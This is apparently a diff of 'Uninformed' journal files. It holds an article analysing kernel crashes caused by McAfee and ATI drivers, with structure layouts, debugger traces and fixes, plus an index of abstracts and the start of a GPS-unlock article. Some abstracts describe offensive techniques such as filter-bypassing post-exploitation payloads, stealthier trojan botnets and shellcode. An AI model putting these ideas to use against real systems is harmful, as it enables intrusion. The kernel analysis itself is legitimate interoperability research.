attempts to perform a similar task, such as may occur when two
|
||||
applications need to extend APIs by hooking them, the results may be
|
||||
unpredictable. Perhaps a more concrete example of where assumptions
|
||||
can lead to problems can be seen when developers assume that the
|
||||
behavior of undocumented or unexposed APIs will not change.
|
||||
|
||||
Before putting all of the blame on the antagonists, however, it is
|
||||
important to understand that it is, in most cases, necessary to make
|
||||
assumptions about the way in which undocumented code performs, such
|
||||
as when dealing with low-level software. This is especially true
|
||||
when dealing with closed-source APIs, such as those provided by
|
||||
Microsoft. To that point, Microsoft has made an effort to document
|
||||
the ways in which every exposed API routine can perform, thereby
|
||||
reducing the number of compatibility issues that a developer might
|
||||
experience if they were to assume that a given routine would always
|
||||
perform in the same manner. Furthermore, Microsoft is renowned for
|
||||
attempting to always provide backwards compatibility. If a
|
||||
Microsoft application performs one way in a given release, chances
|
||||
are that it will continue to perform in the same fashion in
|
||||
subsequent releases. Third-party vendors, on the other hand, tend to
|
||||
have a more egocentric view of the way in which their software
|
||||
should work. This leads most vendors to dodge responsibility by
|
||||
pointing the blame at the application that is attempting to perform
|
||||
a certain task rather than making their code to be more robust.
|
||||
|
||||
In the interest of helping to make code more robust, this document
|
||||
will provide two examples of widely used software that make
|
||||
assumptions about the way in which code will execute on a given
|
||||
machine. The assumptions these applications make are always safe
|
||||
under normal conditions. However, if a new application that
|
||||
performs a certain task or an undocumented change is thrown into the
|
||||
mix, the applications find themselves faltering in the most
|
||||
unenjoyable ways. The two applications that will be analyzed are
|
||||
listed below:
|
||||
|
||||
- McAfee VirusScan Consumer (8.0/9.0)
|
||||
- ATI Radeon 9000 Driver Series
|
||||
|
||||
Each of the assumptions that these two software products make will
|
||||
be analyzed in-depth to describe why it is that they are poor
|
||||
assumptions to make, such as by describing or illustrating
|
||||
conditions where the assumptions are, or could be, false. From
|
||||
there, suggestions will be made on how these assumptions might be
|
||||
worked around or fixed to allow for a more stable product in
|
||||
general. In the end, the reader should have a clear understanding of
|
||||
the assumptions described in this document. If successful, the
|
||||
author hopes the topic will allow the reader to think critically
|
||||
about the various assumptions the reader might make when
|
||||
implementing software.
|
||||
|
||||
|
||||
2) McAfee VirusScan Consumer (8.0/9.0)
|
||||
|
||||
|
||||
2.1) The Assumption
|
||||
|
||||
McAfee VirusScan Consumer 8.0, 9.0, and possibly previous versions
|
||||
make assumptions about processes not performing certain types of
|
||||
file operations during a critical phase of process initialization.
|
||||
If file operations are performed during this phase, the machine may
|
||||
blue screen due to an invalid pointer access.
|
||||
|
||||
|
||||
2.2) The Problem
|
||||
|
||||
The critical phase of process execution that the summary refers to is the
|
||||
period between the time that the new process object instance is created by
|
||||
nt!ObCreateObject and the time the new process object is inserted into the
|
||||
process object type list by nt!ObInsertObject. The reason this phase is so
|
||||
critical is because it is not safe for things to attempt to obtain a handle to
|
||||
the process object, such as can be done by calling nt!ObOpenObjectByPointer.
|
||||
If an application were to attempt to obtain a handle to the process object
|
||||
before it had been inserted into the process object list by nt!ObInsertObject,
|
||||
critical creation state information that is stored in the process object's
|
||||
header would be overwritten with state information that is meant to be used
|
||||
after the process has passed the initial security validation phase that is
|
||||
handled by nt!ObInsertObject. In some cases, overwriting the creation state
|
||||
information prior to calling nt!ObInsertObject can lead to invalid pointer
|
||||
references when nt!ObInsertObject is eventually called, thus leading to an evil
|
||||
blue screen that some users are all too familiar with.
|
||||
|
||||
To better understand this problem it is first necessary to understand the way
|
||||
in which nt!PspCreateProcess creates and initializes the process object and the
|
||||
process handle that is passed back to callers. The object creation portion is
|
||||
accomplished by making a call to nt!ObCreateObject in the following fashion:
|
||||
|
||||
ObCreateObject(
|
||||
KeGetPreviousMode(),
|
||||
PsProcessType,
|
||||
ObjectAttributes,
|
||||
KeGetPreviousMode(),
|
||||
0,
|
||||
0x258,
|
||||
0,
|
||||
0,
|
||||
&ProcessObject);
|
||||
|
||||
If the call is successful, a process object of the supplied size is created and
|
||||
initialized using the attributes supplied by the caller. In this case, the
|
||||
object is created using the nt!PsProcessType object type. The size argument
|
||||
that is supplied to nt!ObCreateObject, which in this case is 0x258, will vary
|
||||
between various versions of Windows as new fields are added and removed from
|
||||
the opaque EPROCESS structure. The process object's instance, as with all
|
||||
objects, is prefixed with an OBJECT_HEADER that may or may not also be prefixed
|
||||
with optional object information. For reference, the OBJECT_HEADER structure is
|
||||
defined as follows:
|
||||
|
||||
OBJECT_HEADER:
|
||||
+0x000 PointerCount : Int4B
|
||||
+0x004 HandleCount : Int4B
|
||||
+0x004 NextToFree : Ptr32 Void
|
||||
+0x008 Type : Ptr32 _OBJECT_TYPE
|
||||
+0x00c NameInfoOffset : UChar
|
||||
+0x00d HandleInfoOffset : UChar
|
||||
+0x00e QuotaInfoOffset : UChar
|
||||
+0x00f Flags : UChar
|
||||
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
|
||||
+0x010 QuotaBlockCharged : Ptr32 Void
|
||||
+0x014 SecurityDescriptor : Ptr32 Void
|
||||
+0x018 Body : _QUAD
|
||||
|
||||
When an object is first returned from nt!ObCreateObject, the Flags attribute
|
||||
will indicate if the ObjectCreateInfo attribute is pointing to valid data by
|
||||
having the OB_FLAG_CREATE_INFO, or 0x1 bit, set. If the flag is set then the
|
||||
ObjectCreateInfo attribute will point to an OBJECT_CREATE_INFORMATION structure
|
||||
which has the following definition:
|
||||
|
||||
OBJECT_CREATE_INFORMATION:
|
||||
+0x000 Attributes : Uint4B
|
||||
+0x004 RootDirectory : Ptr32 Void
|
||||
+0x008 ParseContext : Ptr32 Void
|
||||
+0x00c ProbeMode : Char
|
||||
+0x010 PagedPoolCharge : Uint4B
|
||||
+0x014 NonPagedPoolCharge : Uint4B
|
||||
+0x018 SecurityDescriptorCharge : Uint4B
|
||||
+0x01c SecurityDescriptor : Ptr32 Void
|
||||
+0x020 SecurityQos : Ptr32 _SECURITY_QUALITY_OF_SERVICE
|
||||
+0x024 SecurityQualityOfService : _SECURITY_QUALITY_OF_SERVICE
|
||||
|
||||
When nt!ObInsertObject is finally called, it is assumed that the object still
|
||||
has the OB_FLAG_CREATE_INFO bit set. This will always be the case unless something
|
||||
has caused the bit to be cleared, as will be illustrated later in this chapter.
|
||||
The flow of execution within nt!ObInsertObject begins first by checking to see
|
||||
if the process' object header has any name information, which is conveyed by
|
||||
the NameInfoOffset of the OBJECT_HEADER. Regardless of whether or not the
|
||||
object has name information, the next step taken is to check to see if the
|
||||
object type that is associated with the object that is supplied to
|
||||
nt!ObInsertObject requires a security check to be performed. This requirement
|
||||
is conveyed through the TypeInfo attribute of the OBJECT_TYPE structure which is
|
||||
defined below:
|
||||
|
||||
OBJECT_TYPE:
|
||||
+0x000 Mutex : _ERESOURCE
|
||||
+0x038 TypeList : _LIST_ENTRY
|
||||
+0x040 Name : _UNICODE_STRING
|
||||
+0x048 DefaultObject : Ptr32 Void
|
||||
+0x04c Index : Uint4B
|
||||
+0x050 TotalNumberOfObjects : Uint4B
|
||||
+0x054 TotalNumberOfHandles : Uint4B
|
||||
+0x058 HighWaterNumberOfObjects : Uint4B
|
||||
+0x05c HighWaterNumberOfHandles : Uint4B
|
||||
+0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER
|
||||
+0x0ac Key : Uint4B
|
||||
+0x0b0 ObjectLocks : [4] _ERESOURCE
|
||||
|
||||
OBJECT_TYPE_INITIALIZER:
|
||||
+0x000 Length : Uint2B
|
||||
+0x002 UseDefaultObject : UChar
|
||||
+0x003 CaseInsensitive : UChar
|
||||
+0x004 InvalidAttributes : Uint4B
|
||||
+0x008 GenericMapping : _GENERIC_MAPPING
|
||||
+0x018 ValidAccessMask : Uint4B
|
||||
+0x01c SecurityRequired : UChar
|
||||
+0x01d MaintainHandleCount : UChar
|
||||
+0x01e MaintainTypeList : UChar
|
||||
+0x020 PoolType : _POOL_TYPE
|
||||
+0x024 DefaultPagedPoolCharge : Uint4B
|
||||
+0x028 DefaultNonPagedPoolCharge : Uint4B
|
||||
+0x02c DumpProcedure : Ptr32
|
||||
+0x030 OpenProcedure : Ptr32
|
||||
+0x034 CloseProcedure : Ptr32
|
||||
+0x038 DeleteProcedure : Ptr32
|
||||
+0x03c ParseProcedure : Ptr32
|
||||
+0x040 SecurityProcedure : Ptr32
|
||||
+0x044 QueryNameProcedure : Ptr32
|
||||
+0x048 OkayToCloseProcedure : Ptr32
|
||||
|
||||
The specific boolean field that is checked by nt!ObInsertObject is the
|
||||
TypeInfo.SecurityRequired flag. If the flag is set to TRUE, which it is for
|
||||
the nt!PsProcessType object type, then nt!ObInsertObject uses the access state
|
||||
that is passed in as the second argument or creates a temporary access state
|
||||
that it uses to validate the access mask that is supplied as the third argument
|
||||
to nt!ObInsertObject. Prior to validating the access state, however, the
|
||||
SecurityDescriptor attribute of the ACCESS_STATE structure is set to the
|
||||
SecurityDescriptor of the OBJECT_CREATE_INFORMATION structure. This is done
|
||||
without any checks to ensure that the OB_FLAG_CREATE_INFO flag is still set in the
|
||||
object's header, thus making it potentially dangerous if the flag has been
|
||||
cleared and the union'd attribute no longer points to creation information.
|
||||
|
||||
In order to validate the access mask, nt!ObInsertObject calls into
|
||||
nt!ObpValidateAccessMask with the initialized ACCESS_STATE as the only argument.
|
||||
This function first checks to see if the ACCESS_STATE's SecurityDescriptor
|
||||
attribute is set to NULL. If it's not, then the function checks to see if the
|
||||
SecurityDescriptor's Control attribute has a flag set. It is at this point
|
||||
that the problem is realized under conditions where the object's
|
||||
ObjectCreateInfo attribute no longer points to creation information. When such
|
||||
a condition occurs, the SecurityDescriptor attribute that is referenced
|
||||
relative to the ObjectCreateInfo attribute will potentially point to invalid
|
||||
memory. This can then lead to an access violation when attempting to reference
|
||||
the SecurityDescriptor that is passed as part of the ACCESS_STATE instance to
|
||||
nt!ObpValidateAccessMask. For reference, the ACCESS_STATE structure is defined
|
||||
below:
|
||||
|
||||
ACCESS_STATE:
|
||||
+0x000 OperationID : _LUID
|
||||
+0x008 SecurityEvaluated : UChar
|
||||
+0x009 GenerateAudit : UChar
|
||||
+0x00a GenerateOnClose : UChar
|
||||
+0x00b PrivilegesAllocated : UChar
|
||||
+0x00c Flags : Uint4B
|
||||
+0x010 RemainingDesiredAccess : Uint4B
|
||||
+0x014 PreviouslyGrantedAccess : Uint4B
|
||||
+0x018 OriginalDesiredAccess : Uint4B
|
||||
+0x01c SubjectSecurityContext : _SECURITY_SUBJECT_CONTEXT
|
||||
+0x02c SecurityDescriptor : Ptr32 Void
|
||||
+0x030 AuxData : Ptr32 Void
|
||||
+0x034 Privileges : __unnamed
|
||||
+0x060 AuditPrivileges : UChar
|
||||
+0x064 ObjectName : _UNICODE_STRING
|
||||
+0x06c ObjectTypeName : _UNICODE_STRING
|
||||
|
||||
Under normal conditions, nt!ObInsertObject is the first routine to create a
|
||||
handle to the newly created object instance. When the handle is created, the
|
||||
creation information that was initialized during the instantiation of the
|
||||
object is used for such things as validating access, as described above. Once
|
||||
the creation information is used it is discarded and replaced with other
|
||||
information that is specific to the type of the object being inserted. In the
|
||||
case of process objects, the Flags attribute has the OB_FLAG_CREATE_INFO bit
|
||||
cleared and the QuotaBlockCharged attribute, which is union'd with the
|
||||
ObjectCreateInfo attribute, is set to an instance of an EPROCESS_QUOTA_BLOCK
|
||||
which is defined below:
|
||||
|
||||
EPROCESS_QUOTA_ENTRY:
|
||||
+0x000 Usage : Uint4B
|
||||
+0x004 Limit : Uint4B
|
||||
+0x008 Peak : Uint4B
|
||||
+0x00c Return : Uint4B
|
||||
|
||||
EPROCESS_QUOTA_BLOCK:
|
||||
+0x000 QuotaEntry : [3] _EPROCESS_QUOTA_ENTRY
|
||||
+0x030 QuotaList : _LIST_ENTRY
|
||||
+0x038 ReferenceCount : Uint4B
|
||||
+0x03c ProcessCount : Uint4B
|
||||
|
||||
The assumptions made by nt!ObInsertObject work flawlessly so long as it is the
|
||||
first routine to create a handle to the object instance. Fortunately, under
|
||||
normal circumstances, nt!ObInsertObject is always the first routine to create a
|
||||
handle to the object. Unfortunately for McAfee, however, they assume that they
|
||||
can safely attempt to obtain a handle to a process object without first
|
||||
checking to see what state of execution the process is in, such as by checking
|
||||
to see if the OB_FLAG_CREATE_INFO flag is set in the object's header. By
|
||||
attempting to obtain a handle to the process object before it is inserted by
|
||||
nt!ObInsertObject, McAfee effectively destroys state that is needed by
|
||||
nt!ObInsertObject to succeed.
|
||||
|
||||
To show this problem being experienced in the real world, the following
|
||||
debugger output shows McAfee first attempting to obtain a handle to the process
|
||||
object which is then followed shortly thereafter by nt!ObInsertObject
|
||||
attempting to validate the object's access mask with a bogus SecurityDescriptor
|
||||
which, in turn, results in an unrecoverable access violation:
|
||||
|
||||
McAfee attempting to open a handle to the process object before
|
||||
nt!ObInsertObject has been called:
|
||||
|
||||
kd> k
|
||||
nt!ObpChargeQuotaForObject+0x2f
|
||||
nt!ObpIncrementHandleCount+0x70
|
||||
nt!ObpCreateHandle+0x17c
|
||||
nt!ObOpenObjectByPointer+0x97
|
||||
WARNING: Stack unwind information not available.
|
||||
NaiFiltr+0x2e45
|
||||
NaiFiltr+0x3bb2
|
||||
NaiFiltr+0x4217
|
||||
nt!ObpLookupObjectName+0x56a
|
||||
nt!ObOpenObjectByName+0xe9
|
||||
nt!IopCreateFile+0x407
|
||||
nt!IoCreateFile+0x36
|
||||
nt!NtOpenFile+0x25
|
||||
nt!KiSystemService+0xc4
|
||||
nt!ZwOpenFile+0x11
|
||||
0x80a367b5
|
||||
nt!PspCreateProcess+0x326
|
||||
nt!NtCreateProcessEx+0x7e
|
||||
nt!KiSystemService+0xc4
|
||||
|
||||
After which point nt!ObInsertObject attempts to validate the
|
||||
object's access mask using an invalid SecurityDescriptor:
|
||||
|
||||
kd> k
|
||||
nt!ObpValidateAccessMask+0xb
|
||||
nt!ObInsertObject+0x1c2
|
||||
nt!PspCreateProcess+0x5dc
|
||||
nt!NtCreateProcessEx+0x7e
|
||||
nt!KiSystemService+0xc4
|
||||
kd> r
|
||||
eax=fa7bbb54 ebx=ffa9fc60 ecx=00023994
|
||||
edx=00000000 esi=00000000 edi=ffb83f00
|
||||
eip=8057828e esp=fa7bbb40 ebp=fa7bbbb8
|
||||
iopl=0 nv up ei pl nz na pe nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023
|
||||
fs=0030 gs=0000 efl=00000202
|
||||
nt!ObpValidateAccessMask+0xb:
|
||||
8057828e f6410210
|
||||
test byte ptr [ecx+0x2],0x10 ds:0023:00023996=??
|
||||
|
||||
The method by which this issue was located was by setting a breakpoint on the
|
||||
instruction after the call to nt!ObCreateObject in nt!PspCreateProcess. Once
|
||||
hit, a memory access breakpoint was set on the Flags attribute of the object's
|
||||
header that would break whenever the field was written to. This, in turn, lead
|
||||
to the tracking down of the fact that McAfee was acquiring a handle to the
|
||||
process object prior to nt!ObInsertObject being called, which in turn lead to
|
||||
the OB_FLAG_CREATE_INFO flag being cleared and the ObjectCreateInfo attribute
|
||||
being invalidated.
|
||||
|
||||
|
||||
2.3) The Solution
|
||||
|
||||
There are two ways that have been identified that could correct this issue.
|
||||
The first, and most plausible, would be for McAfee to modify their driver such
|
||||
that it will refuse to acquire a handle to a process object if the
|
||||
OB_FLAG_CREATE_INFO bit is set in the process' object header Flags attribute. The
|
||||
downside to using this approach is that it requires McAfee to make use of
|
||||
undocumented structures that are intended by Microsoft to be opaque, and for
|
||||
good reason. However, the author is not currently aware of another means by
|
||||
which an object's creation state can be detected using general purpose API
|
||||
routines.
|
||||
|
||||
The second approach, and it's one that should at least result in a bugcheck
|
||||
within nt!ObInsertObject, would be to check to see if the object's
|
||||
OB_FLAG_CREATE_INFO bit has been cleared. If it has, an alternate action can be
|
||||
taken to validate the object's access mask. If it hasn't, the current method
|
||||
of validating the access mask can be used. At this point in time, the author
|
||||
cannot currently speak on what the alternate action would be, though it seems
|
||||
plausible that there would be another means by which a synonymous action could
|
||||
be performed without relying on the creation information in the object header.
|
||||
|
||||
In the event that neither of these solutions are pursued, it will continue to
|
||||
be necessary for protagonistic developers to avoid performing actions between
|
||||
nt!ObCreateObject and nt!ObInsertObject that might result in file operations
|
||||
being performed from within the new process' context. One of a number of
|
||||
work-arounds to this problem would be to post file operations off to a system
|
||||
worker thread that would then inherently run within the context of the System
|
||||
process rather than the new process.
|
||||
|
||||
|
||||
3) ATI Radeon 9000 Driver Series
|
||||
|
||||
|
||||
3.1) The Assumption
|
||||
|
||||
The ATI Radeon 9000 Driver Series, and likely other ATI driver series, makes
|
||||
assumptions about the location that the RTL_USER_PROCESS_PARAMETERS structure will
|
||||
be mapped at in the address space of a process that attempts to do 3D
|
||||
operations. If the structure is not mapped at the address that is expected,
|
||||
the machine may blue screen depending on the values that exist at the memory
|
||||
location, if any.
|
||||
|
||||
|
||||
3.2) The Problem
|
||||
|
||||
During some experimentation with changing the default address space layout of
|
||||
processes on NT-based versions of Windows, it was noticed that machines that
|
||||
were using the ATI Radeon 9000 series drivers would crash if a process
|
||||
attempted to do 3D operations and the location of the process' parameter
|
||||
information was changed from the address at which it is normally mapped at.
|
||||
Before proceeding, it is first necessary for the reader to understand the
|
||||
purpose of the process parameter information structure and how it is that it's
|
||||
mapped into the process' address space.
|
||||
|
||||
Most programmers are familiar with the API routine kernel32!CreateProcess[A/W].
|
||||
This routine serves as the primary means by which user-mode applications spawn
|
||||
new processes. The function itself is robust enough to support a number of
|
||||
ways in which a new process can be initialized and then executed. Behind the
|
||||
scenes, CreateProcess performs all of the necessary operations to prepare the
|
||||
new task for execution. These options include opening the executable image
|
||||
file and creating a section object that is then passed to
|
||||
ntdll!NtCreateProcessEx which returns a unique process handle on success. If a
|
||||
handle is obtained, CreateProcess then proceeds to prepare the process for
|
||||
execution by initializing the process' parameters as well as creating and
|
||||
initializing the first thread in the process. A more complete analysis of the
|
||||
way in which CreateProcess operates can be found in David Probert's excellent
|
||||
analysis of Windows NT's process architecture.
|
||||
|
||||
For the purpose of this document, however, the part that is of most concern is
|
||||
that step in which CreateProcess initializes the new process' parameters. This
|
||||
is accomplished by making a call into kernel32!BasePushProcessParameters which
|
||||
in turn calls into ntdll!RtlCreateProcessParameters. The parameters are
|
||||
initialized within the process that is calling CreateProcess and are then, in
|
||||
turn, copied into the address space of the new process by first allocating
|
||||
storage with ntdll!NtAllocateVirtualMemory and then by copying the memory from
|
||||
the parent process to the child with ntdll!NtWriteVirtualMemory. Due to the
|
||||
fact that this occurs before the new process actually executes any code, the
|
||||
address that the process parameter structure is allocated at is almost
|
||||
guaranteed to be at the same address. This address happens to be 0x00020000.
|
||||
This fact is most likely why ATI made the assumption that the process parameter
|
||||
information would always be at a static address.
|
||||
|
||||
If, however, ntdll!NtAllocateVirtualMemory allocates the process parameter
|
||||
storage at any place other than the static address described above, ATI's
|
||||
driver will attempt to reference a potentially invalid address when it comes
|
||||
time to perform 3D operations. The specific portion of the driver suite that
|
||||
has the error is the ATI3DUAG.DLL kernel-mode graphics driver. Inside this
|
||||
image there is a portion of code that attempts to make reference to the
|
||||
addresses 0x00020038 and 0x0002003C without doing any sort of probing and
|
||||
locking or validation on the region it's requesting. If the region does not
|
||||
exist or contains unexpected data, a blue screen is a sure thing. The actual
|
||||
portion of the driver that makes this assumption can be found below:
|
||||
|
||||
mov [ebp+var_4], eax
|
||||
mov edx, 20000h <--
|
||||
mov [ebp+var_24], edx
|
||||
movzx ecx, word ptr ds:dword_20035+3 <--
|
||||
shr ecx, 1
|
||||
mov [ebp+var_28], ecx
|
||||
lea eax, [ecx-1]
|
||||
mov [ebp+var_1C], eax
|
||||
test eax, eax
|
||||
jbe short loc_227CC
|
||||
mov ebx, [edx+3Ch] <--
|
||||
cmp word ptr [ebx+eax*2], '\'
|
||||
|
||||
The lines of intereste are marked by ``<--'' indicators pointing to the exact
|
||||
instructions that result in a reference being made to an address that is
|
||||
expected to be within a process' parameter information structure. For the sake
|
||||
of investigation, one might wonder what it is that the driver could be
|
||||
attempting to reference. To determine that, it is first necessary to dump the
|
||||
format of the process parameter structure which, as stated previously, is
|
||||
RTL_USER_PROCESS_PARAMETERS:
|
||||
|
||||
RTL_USER_PROCESS_PARAMETERS:
|
||||
+0x000 MaximumLength : Uint4B
|
||||
+0x004 Length : Uint4B
|
||||
+0x008 Flags : Uint4B
|
||||
+0x00c DebugFlags : Uint4B
|
||||
+0x010 ConsoleHandle : Ptr32 Void
|
||||
+0x014 ConsoleFlags : Uint4B
|
||||
+0x018 StandardInput : Ptr32 Void
|
||||
+0x01c StandardOutput : Ptr32 Void
|
||||
+0x020 StandardError : Ptr32 Void
|
||||
+0x024 CurrentDirectory : _CURDIR
|
||||
+0x030 DllPath : _UNICODE_STRING
|
||||
+0x038 ImagePathName : _UNICODE_STRING
|
||||
+0x040 CommandLine : _UNICODE_STRING
|
||||
+0x048 Environment : Ptr32 Void
|
||||
+0x04c StartingX : Uint4B
|
||||
+0x050 StartingY : Uint4B
|
||||
+0x054 CountX : Uint4B
|
||||
+0x058 CountY : Uint4B
|
||||
+0x05c CountCharsX : Uint4B
|
||||
+0x060 CountCharsY : Uint4B
|
||||
+0x064 FillAttribute : Uint4B
|
||||
+0x068 WindowFlags : Uint4B
|
||||
+0x06c ShowWindowFlags : Uint4B
|
||||
+0x070 WindowTitle : _UNICODE_STRING
|
||||
+0x078 DesktopInfo : _UNICODE_STRING
|
||||
+0x080 ShellInfo : _UNICODE_STRING
|
||||
+0x088 RuntimeData : _UNICODE_STRING
|
||||
+0x090 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR
|
||||
|
||||
To determine the attribute that the driver is attempting to reference, one must
|
||||
take the addresses and subtract them from the base address 0x00020000. This
|
||||
produces two offsets: 0x38 and 0x3c. Both of these offsets are within the
|
||||
ImagePathName attribute which is a UNICODE_STRING. The UNICODE_STRING structure
|
||||
is defined as:
|
||||
|
||||
UNICODE_STRING:
|
||||
+0x000 Length : Uint2B
|
||||
+0x002 MaximumLength : Uint2B
|
||||
+0x004 Buffer : Ptr32 Uint2B
|
||||
|
||||
This would mean that the driver is attempting to reference the path name of the
|
||||
process' executable image. The 0x38 offset is the length of the image path
|
||||
name and the 0x3c is the pointer to the image path name buffer that actually
|
||||
contains the path. The reason that the driver would need to get access to the
|
||||
executable path is outside of the scope of this discussion, but suffice to say
|
||||
that the method on which it is based is an assumption that may not always be
|
||||
safe to make, especially under conditions where the process' parameter
|
||||
information is not mapped at 0x00020000.
|
||||
|
||||
|
||||
3.3) The Solution
|
||||
|
||||
The solution to this problem would be for ATI to come up with an alternate
|
||||
means by which the process' image path name can be obtained. Possibilities for
|
||||
alternate methods include referencing the PEB to obtain the address of the
|
||||
process parameters (by using the ProcessParameters attribute of the PEB). This
|
||||
approach is suboptimal because it requires that ATI attempt to reference fields
|
||||
in a structure that is intended to be opaque and also readily changes between
|
||||
versions of Windows. Another alternate approach, which is perhaps the most
|
||||
feasible, would be to make use of the ProcessImageFileName PROCESSINFOCLASS.
|
||||
This information class can be queried using the NtQueryInformationProcess
|
||||
system call to populate a UNICODE_STRING that contains the full path to the
|
||||
image that is associated with the handle that is supplied to
|
||||
NtQueryInformationProcess. The nice thing about this is that it actually
|
||||
indirectly uses the alternate method from the first proposal, but it does so
|
||||
internally rather than forcing an external vendor to access fields of the PEB.
|
||||
|
||||
Regardless of the actual solution, it seems obvious that assuming that a region
|
||||
of memory will be mapped at a fixed address in every process is something that
|
||||
ATI should not do. There are indeed cases where Windows itself requires
|
||||
certain things to be mapped at the same address between one execution of a
|
||||
process to the next, but it is the opinion of the author that ATI should not
|
||||
assume things that Windows itself does not also assume.
|
||||
|
||||
|
||||
4) Conclusion
|
||||
|
||||
Though this document may appear as an attempt to make specific 3rd party
|
||||
vendors look bad, that is not its intention. In fact, the author acknowledges
|
||||
having been an antagonistic developer in the past. To that point, the author
|
||||
hopes that by providing specific illustrations of where assumptions made by 3rd
|
||||
parties can lead to problems, the reader will be more apt to consider potential
|
||||
conditions that might become problematic if other applications attempt to
|
||||
co-exist with ones that the reader may write in the future.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Probert, David B. Windows Kernel Internals: Process Architecture.
|
||||
http://www.i.u-tokyo.ac.jp/ss/lecture/new-documents/Lectures/13-Processes/Processes.ppt;
|
||||
accessed April 04, 2005.
|
43
uninformed/1.txt
Normal file
43
uninformed/1.txt
Normal file
|
@ -0,0 +1,43 @@
|
|||
|
||||
|
||||
Engineering in Reverse
|
||||
Introduction to Reverse Engineering Win32 Applications
|
||||
trew
|
||||
During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of Windows Debugger (WinDBG). Throughout, WinMine will be utilized as a vehicle to deliver and demonstrate the functionality provided by WinDBG and how this functionality can be harnessed to aid the reader in reverse engineering native Win32 applications. Topics covered include an introductory look at IA-32 assembly, register significance, memory protection, stack usage, various WinDBG commands, call stacks, endianness, and portions of the Windows API. Knowledge gleaned will be used to develop an application designed to reveal and/or remove bombs from the WinMine playing grid.
|
||||
code.tgz | pdf | html | txt
|
||||
|
||||
Exploitation Technology
|
||||
Post-Exploitation on Windows using ActiveX Controls
|
||||
skape
|
||||
When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS.
|
||||
pdf | html | txt
|
||||
|
||||
General Research
|
||||
Smart Parking Meters
|
||||
h1kari
|
||||
Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackblox secure memory card.
|
||||
html | txt
|
||||
|
||||
General Security
|
||||
Loop Detection
|
||||
Peter Silberman
|
||||
During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and a case study will be given to illustrate its uses. All of the implementations provided in this document have been written in C/C++ using Interactive Disassembler (IDA) plug-ins.
|
||||
code.tgz | pdf | html | txt
|
||||
|
||||
Social Zombies: Aspects of Trojan Networks
|
||||
warlord
|
||||
Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft of money and confidential data as well as extortion, spam, and a whole plethora of further ways. Most often the infected hosts are linked into simple botnets to provide an easy way for the botnet manager to command his zombie army. This article describes ways to form far more effective networks than the ones in use today by the means of stealth, deception, and cryptography.
|
||||
pdf | html | txt
|
||||
|
||||
Machine Speak
|
||||
Mac OS X PPC Shellcode Tricks
|
||||
H D Moore
|
||||
Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction caches of the PowerPC processor can cause a variety of problems with exploit and shellcode development. The common practice of patching opcodes at run-time is much more involved when the instruction cache is in incoherent mode. NULL-free shellcode can be improved by taking advantage of index registers and the reserved bits found in many opcodes, saving space otherwise taken by standard NULL evasion techniques. The Mac OS X operating system introduces a few challenges to unsuspecting developers; system calls change their return address based on whether they succeed and oddities in the Darwin kernel can prevent standard execve() shellcode from working properly with a threaded process. The virtual memory layout on Mac OS X can be abused to overcome instruction cache obstacles and develop even smaller shellcode.
|
||||
pdf | html | txt
|
||||
|
||||
What Were They Thinking?
|
||||
Annoyances Caused by Unsafe Assumptions
|
||||
skape
|
||||
This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases will be dissected and discussed in detail for the purpose of showing how third-party applications can fail when used in conjunction with software that performs certain tasks. The analysis of the two cases is meant to show how complex failure conditions can be analyzed and used to determine inter-operability problems.
|
||||
pdf | html | txt
|
||||
|
929
uninformed/10.1.txt
Normal file
929
uninformed/10.1.txt
Normal file
|
@ -0,0 +1,929 @@
|
|||
Can you find me now? - Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS
|
||||
10/2008
|
||||
Skywing
|
||||
skywing_uninformed@valhallalegends.com
|
||||
|
||||
0. Abstract
|
||||
|
||||
In August 2008 Verizon Wireless released a firmware upgrade for their xv6800
|
||||
(rebranded HTC Titan) line of Windows Mobile smartphones that provided a number
|
||||
of new features previously unavailable on the device on the initial release
|
||||
firmware. In particular, support for accessing the device's built-in Qualcomm
|
||||
gpsOne assisted GPS chipset was introduced with this update. However, Verizon
|
||||
Wireless elected to attempt to lock down the GPS hardware on xv6800 such that
|
||||
only applications authorized by Verizon Wireless would be able to access the
|
||||
device's built-in GPS hardware and perform location-based functions (such as
|
||||
GPS-assisted navigation). The mechanism used to lock down the GPS hardware is
|
||||
entirely client-side based, however, and as such suffers from fundamental
|
||||
limitations in terms of how effective the lockdown can be in the face of an
|
||||
almost fully user-programmable Windows Mobile-based device. This article
|
||||
outlines the basic philosophy used to prevent unauthorized applications from
|
||||
accessing the GPS hardware and provides a discussion of several of the flaws
|
||||
inherent in the chosen design of the protection mechanism. In addition,
|
||||
several pitfalls relating to debugging and reverse engineering programs on
|
||||
Windows Mobile are also discussed. Finally, an overview of several suggested
|
||||
design alterations that would have mitigated some of the flaws in the current
|
||||
GPS lock down system from the perspective of safeguarding the privacy of user
|
||||
location data are also presented.
|
||||
|
||||
1. Introduction
|
||||
|
||||
The Verizon Wireless xv6800 (which is in and of itself a rebranded version of
|
||||
